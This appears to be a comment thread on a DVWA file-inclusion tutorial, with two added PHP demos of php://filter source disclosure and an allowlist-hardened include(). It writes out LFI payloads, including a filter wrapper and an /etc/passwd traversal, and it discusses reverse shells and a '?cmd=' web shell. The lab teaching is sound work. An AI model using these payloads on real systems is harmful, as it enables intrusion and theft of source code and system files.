Had a few questions about Quote 3 missing - apologies I missed this in the initial video! For anybody stuck at this point take a look at these resources: www.aptive.co.uk/blog/local-file-inclusion-lfi-testing/ highon.coffee/blog/lfi-cheat-sheet/#php-wrapper-phpfilter book.hacktricks.xyz/pentesting-web/file-inclusion#lfi-rfi-using-php-wrappers Essentially we want to read the code of fi.php, not execute it! We can use some of the PHP filter tricks from cheatsheets above to achieve this e.g. 127.0.0.1/dvwa/vulnerabilities/fi/?page=php://filter/convert.base64-encode/resource=../../hackable/flags/fi.php Then base64 decode the result in whatever way you prefer and see the missing quotes 😉
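An added example (mine, not from the video or from DVWA's source) that reproduces the trick above locally, so you can see why the filter wrapper returns source instead of output. It writes a constructed stand-in for fi.php to a temp file, includes it both ways, and decodes the result; the DVWA URL it prints is the one from the comment. Run it with `php filter_demo.php`:

```php
<?php
// Added example (not from the video or DVWA): why php://filter leaks source.
// Run with: php filter_demo.php

// Constructed stand-in for hackable/flags/fi.php: a "hidden" line that exists
// only in the source, plus code that runs when the file is included normally.
$target = tempnam(sys_get_temp_dir(), 'fi_');
file_put_contents($target, <<<'PHP'
<?php
// Quote 3 (hidden): lives only in the source, never in the rendered page.
echo "Quote 1: visible when the file is executed\n";
PHP
);

// 1. A plain include() executes the file: the comment is gone, only the echo remains.
echo "--- include() executes the file ---\n";
include $target;

// 2. Including through php://filter base64-encodes the bytes before the
//    interpreter sees them. There is no "<?php" tag left in that stream, so PHP
//    treats the whole thing as literal text and prints it instead of running it.
//    php://filter is not restricted by allow_url_include, which is why this
//    works even on a server where RFI does not.
echo "\n--- include() through php://filter returns base64 ---\n";
ob_start();
include 'php://filter/convert.base64-encode/resource=' . $target;
$encoded = ob_get_clean();
echo $encoded, "\n";

// 3. Decode on the attacker side to recover the source, hidden line included.
echo "\n--- decoded source ---\n";
echo base64_decode($encoded);

// The same payload as the DVWA request quoted in the comment above; the server
// returns the base64 in the page body, which is what you then decode.
$dvwa = 'http://127.0.0.1/dvwa/vulnerabilities/fi/?page='
      . 'php://filter/convert.base64-encode/resource=../../hackable/flags/fi.php';
echo "\nDVWA payload: $dvwa\n";

unlink($target);
```

The decoded block in step 3 is exactly the file on disk, comments and all, which is what the "missing quote" is: a line that only exists in the source and never reaches the browser when the file is executed normally.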
I have been looking for a way to get the third quote by myself, since I wanted to just cat the file with the reverse shell, but I'm running DVWA in Docker and can't easily find php.ini. Can't believe I didn't see this comment. Great vid btw!
Great video. I'm learning quite a lot; thank you for providing such information for free. For the guys asking about the hidden line 3: we got a reverse shell on the system, so you can "cd" to the hackable folder and "cat" the contents of the "fi.php" file. That way you'll read the source code behind the file itself, which will expose the hidden line, e.g. $ cat /var/www/html/dvwa/hackable/flags/fi.php. Of course, this is the full path to the file on my VM; replace the path to match your system setup :)
I don't fully understand why you needed to start a Python server? Also, why can we not see the other php file when you checked port 9000, why can we only see shell.php?
It's been a long time since I made this *but* I might have used the HTTP server to verify that the server could make an outbound connection before trying a shell, so that if the shell doesn't work we know it's likely the shell itself, rather than the server's inability to make remote connections.
Quite often I'll just use a really simple shell.php containing: Then pass the system command as a get parameter, e.g. victim.oops/?cmd=whoami For more web shells: github.com/swisskyrepo/PayloadsAllTheThings For reverse shells, this site is great: www.revshells.com 😉
It's a helpful and great video! Unfortunately, I have some questions from when I tried RFI with a reverse shell. Is there any way I could contact you?
@_CryptoCat Oh no! My reply has disappeared! RU-vid... let me write the comment down again, please! 🥲 OK! Thank you for your reply! I run DVWA via the vulnerables/web-dvwa Docker image, and both items in the Setup Check are Enabled. In addition, I could successfully RFI by including a Google page. However, my Python HTTP server and nc didn't receive anything, even though the PHP file is just "Hello World!". Do you have any idea or suggestion?
The comment was sent to the "held for review" section 🙄 Got it now! If you run DVWA within a Docker container, you'll need to also run the Python HTTP server and nc inside that Docker instance (as by design, you shouldn't be able to communicate with your host OS from the container). You can run commands inside the container with docs.docker.com/engine/reference/commandline/exec
Wow! I was having trouble getting a shell back because of the contents of shell.php. I had to change them to match yours exactly. In a real-world scenario, allow_url_include has to be turned on for this to work, right? What if it's turned off; do you know of any way to work around this? Thanks
Yep, exactly! For PHP you would need allow_url_include enabled for RFI to work, but LFI may still be possible without it. require, require_once, include and include_once are vulnerable functions, so look out for these when no other form of input validation is in place 😉
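An added example (mine, not DVWA's code) of the point made in the reply above: the include() sink with a request parameter fed straight into it, beside a hardened version that maps the parameter through an allowlist. It builds a constructed page directory and a sensitive file one level up in a temp directory, then runs the same three requests through both functions. The file names and paths are made up for the demo. Run it with `php include_demo.php`:

```php
<?php
// Added example, not DVWA's own code: a low-level include() sink beside a
// hardened version. Run with: php include_demo.php

// Constructed stand-in for an app whose pages live in one directory, with a
// sensitive file one level up (playing the role of hackable/flags/fi.php).
$root  = sys_get_temp_dir() . '/fi_demo_' . getmypid();
$pages = "$root/pages";
mkdir($pages, 0700, true);
file_put_contents("$pages/include.php", '<?php echo "[include.php] legitimate page\n";');
file_put_contents("$root/secret.php",   '<?php echo "[secret.php] executed: should never be reachable\n";');
chdir($pages); // relative include paths now resolve against the pages directory

// The vulnerable pattern: the request parameter goes straight into include().
// With allow_url_include=0 this is still LFI (traversal, php://filter);
// with allow_url_include=1 it becomes RFI as well (http://, ftp:// wrappers).
function vulnerable_include(string $page): void
{
    include $page;
}

// Hardened: the parameter only selects an entry from a fixed map, and only the
// map's value reaches include(). Traversal and stream wrappers never get that far.
function safe_include(string $page): void
{
    static $allowed = [
        'include.php' => 'include.php',
    ];
    if (!isset($allowed[$page])) {
        throw new InvalidArgumentException("page not in allowlist: $page");
    }
    include $allowed[$page];
}

echo 'allow_url_include = ', var_export((bool) ini_get('allow_url_include'), true), "\n\n";

$requests = [
    'include.php',                                               // legitimate
    '../secret.php',                                             // LFI by traversal
    'php://filter/convert.base64-encode/resource=../secret.php', // source disclosure
];

foreach ($requests as $page) {
    echo "?page=$page\n";

    ob_start();
    vulnerable_include($page);
    echo "  vulnerable: ", rtrim(ob_get_clean()), "\n";

    try {
        ob_start();
        safe_include($page);
        echo "  hardened:   ", rtrim(ob_get_clean()), "\n";
    } catch (InvalidArgumentException $e) {
        ob_end_clean();
        echo "  hardened:   rejected (", $e->getMessage(), ")\n";
    }
    echo "\n";
}

// Remove the constructed files.
unlink("$pages/include.php");
unlink("$root/secret.php");
rmdir($pages);
rmdir($root);
```

The first line of output shows allow_url_include for the interpreter you ran this under, which is the switch that decides whether the vulnerable function is "only" LFI or RFI too. The hardened version does not depend on that setting at all: because the user-supplied string is used as a lookup key and never as a path, there is nothing for a wrapper or a ../ sequence to act on.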
Hi mate, I'm not 100% sure, but you probably need to have the shell connect back to your Docker IP address rather than your VM IP address. If you run the Docker container with the -it flag it should give you a shell: docs.docker.com/engine/reference/commandline/exec/
Oh yeah, good point! You might be able to use some tricks to read the PHP file's source code; check this out: infinitelogins.com/2020/04/25/lfi-php-wrappers-to-obtain-source-code/
Hey, the local file inclusion doesn't seem to work for me on the low level. I'm trying this: "?page=../../../../../../etc/passwd" and it's not working; it only says no such file or directory.
@_CryptoCat Oh yeah, I did try other files; also, I was on Windows, which was the main cause. I'm currently researching the Windows file system, but if you know the Windows equivalent of /etc/passwd you could tell me.